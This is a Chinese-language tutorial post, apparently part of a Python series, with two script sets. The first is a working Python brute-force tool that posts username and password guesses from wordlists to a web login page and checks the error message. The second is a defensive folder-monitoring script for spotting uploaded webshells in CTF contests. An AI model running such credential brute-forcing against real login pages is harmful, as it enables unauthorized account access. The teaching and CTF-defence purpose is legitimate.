前言:
一些实用小脚本02。
目录:
爆破脚本:
爆破脚本也是我们经常使用的东西
这里就简单讲讲后台爆破脚本的编写吧
在编写之前,我们先通过访问网站去看看情况
首先我们可以先登录看看
输入账号 admin ,密码 12345 后
登录失败,提示 用户名或密码错误
在输入正确的密码 123456 后,则会跳到用户界面
然后我们可以通过这个信息去判断是否登录成功
现在我们有了登录密码,有了判断是否登录成功的信息
还有就是如何构造 post 包
我们可以先用 burp 抓一下看看
现在我们可以看到,这些数据发送到了 /user/logCheck.php 的页面,
很明显这是判断用户名和密码的,
POST 数据为 user=admin&pass=123456&submit=login
有了这些信息,就可以写脚本了,
脚本其实跟前面的一些类似,无非就是判断不同
直接来看代码
假设我们知道用户名为 admin ,
那么我们可以直接爆破密码,
使用 format() 函数把密码传进去
# -*- coding: utf-8 -*-
import requests
import time
import re
def login(pwd):
try:
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"
}
url = "http://www.vd.com/user/logCheck.php"
login = {"user":"admin","pass":"{}".format(pwd),"submit":"login"}
r = requests.post(url,headers=headers,data=login)
r.encoding = 'utf-8'
if '用户名或密码错误' in r.text:
print("用户名: " +user+ " 密码: " + pwd +" -----> 登录失败")
else:
print("用户名: " +user+ " 密码: " + pwd + " -----> 登录成功")
except:
print("用户名: " +user+ " 密码: " + pwd + " -----> 无法访问")
password = open('D:/top100.txt','r')
for pwd in password.readlines():
pwd = pwd.strip('\n')
login(pwd)
username.close()
下面是运行结果
假设用户名也不知道,那么我们也可以连用户名也一起爆破,
给用户名也加一个 format() 就行了
下面是代码
使用 for 循环来传入用户名和密码进行爆破
import requests
import time
import re
def login(user,pwd):
try:
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"
}
url = "http://www.vd.com/user/logCheck.php"
login = {"user":"{}".format(user),"pass":"{}".format(pwd),"submit":"login"}
r = requests.post(url,headers=headers,data=login)
r.encoding = 'utf-8'
if '用户名或密码错误' in r.text:
print("用户名: " +user+ " 密码: " + pwd +" -----> 登录失败")
else:
print("用户名: " +user+ " 密码: " + pwd + " -----> 登录成功")
except:
print("用户名: " +user+ " 密码: " + pwd + " -----> 无法访问")
username = open('D:/user.txt','r')
for user in username.readlines():
user = user.strip('\n')
password = open('D:/top100.txt','r')
for pwd in password.readlines():
pwd = pwd.strip('\n')
login(user,pwd)
username.close()
password.close()
运行结果
验证完 admin 就验证 root
文件监控:
在ctf线下赛中,经常会遇到文件上传漏洞,
那么在我们不会修复漏洞的情况下,就会被挂马 getshell了,
然而我们即使知道上传的文件在哪里,
那么也不可能一直守着那个文件夹删除文件,
你删除也没有别人的脚本操作快,你删除时别人已经 getflag 了,
在这种情况下,我们就需要一个文件监控脚本来帮助我们去完成这个操作。
编写思路:
先获取原文件夹里的文件,做一个白名单,
然后监控是否有新增文件
方法一:
先来看看代码,编写思路是这样子的,
将要监控的文件夹复制到其他地方,当作一个白名单,
然后重复比对这两个文件夹里面的内容,
如果在白名单上没有的,那么就是新增的文件,
下面是一个纯监控脚本,如需要后续操作,比如删除,可自行添加
import os
import shutil
import time
def backup(path1,path2):
global file_list
if os.path.isdir(path2): # 判断白名单文件夹是否存在
file_list = os.listdir(path2) # 白名单文件
else:
shutil.copytree(path1,path2) # 将 path1 文件复制到 path2 作为白名单
file_list = os.listdir(path2) # 白名单文件
def checkfile(file_list):
while 1:
check_file = os.listdir(path1) # 要监控的文件夹
tmp = [file for file in check_file if not file in file_list] # 列表推导式,获取差集
if tmp: # 判断是否有新增文件
for file in tmp:
print('发现新文件 -----> ' + file)
file_list.append(str(file)) # 避免重复输出
else:
pass
# print(tmp)
time.sleep(3) # 每3秒循环一次
if __name__ == '__main__':
path1 = 'D:/123' # 要监控的文件夹,123为文件夹名字
path2 = 'E:/123' # 白名单路径,123为文件夹名字
backup(path1,path2)
checkfile(file_list)
最后效果就是这样子的
除了列表推导式,我们还可以用其他方法获取差集,
那就是使用 difference() 函数,
这种方式比列表推导式更高效
代码其实都差不多,这里就不做更多的介绍了
import os
import shutil
import time
def backup(path1,path2):
global file_list
if os.path.isdir(path2): # 判断白名单文件夹是否存在
file_list = os.listdir(path2) # 白名单文件
else:
shutil.copytree(path1,path2) # 将 path1 文件复制到 path2 作为白名单
file_list = os.listdir(path2) # 白名单文件
def checkfile(file_list):
while 1:
check_file = os.listdir(path1) # 要监控的文件夹
tmp = list(set(check_file).difference(set(file_list))) # 获取差集,check_file 中有,而 file_list 中没有
if tmp: # 判断是否有新增文件
for file in tmp:
print('发现新文件 -----> ' + file)
file_list.append(str(file)) # 避免重复输出
else:
pass
# print(tmp)
time.sleep(3) # 每3秒循环一次
if __name__ == '__main__':
path1 = 'D:/123' # 要监控的文件夹,123为文件夹名字
path2 = 'E:/123' # 白名单路径,123为文件夹名字
backup(path1,path2)
checkfile(file_list)
方法二:
方法一中复制文件夹到其他地方的方式颇为笨重 ,
如果要监控的目录文件非常多,那么就会非常不方便
下面这个方法,不需要复制文件夹也能实现监控效果,
在脚本第一次运行的时候获取一个初始文件列表 file_list
然后在第二次以及后面的运行中获取的文件作为 check_dir
然后再判断两个列表中是否有不相同的文件存在
脚本运行后,你往文件夹丢文件就能看到效果了,脚本默认是 3 秒检测一次。
import os
import time
def list_dir(filepath):
global file_list
file_list = os.listdir(filepath) # 获取初始文件列表,作为白名单
def checkfile(filepath):
while 1:
check_dir = os.listdir(filepath) # 获取路径下的文件
for file in check_dir:
if str(file) not in str(file_list):
print('发现新文件 -----> ' + file)
file_list.append(str(file))
else:
pass
time.sleep(3) # 3秒循环一次
if __name__ == '__main__':
filepath = 'D:/123' # 要监控的目录路径,D盘下的123文件夹
list_dir(filepath)
checkfile(filepath)
效果呢,也是一样的
总结:
如果在比赛中,time.sleep 可能就不需要了,
还要增加一个删除操作,不管上传什么东西,都给删除掉
细心的小伙伴会发现脚本中的bug,
比如这个 append() 操作,这是为了防止循环打印相同的文件而添加的操作,
但是这个操作也导致了一个 bug ,就是第二次上传相同文件名的文件时就会进入白名单,
当然,如果我们添加了删除操作,那么就可以取消 append() 了,
差不多就说到这里了,
Python从0到POC编写 这个系列也差不多结束了,
如果后续有其他的东西,还会添加上去。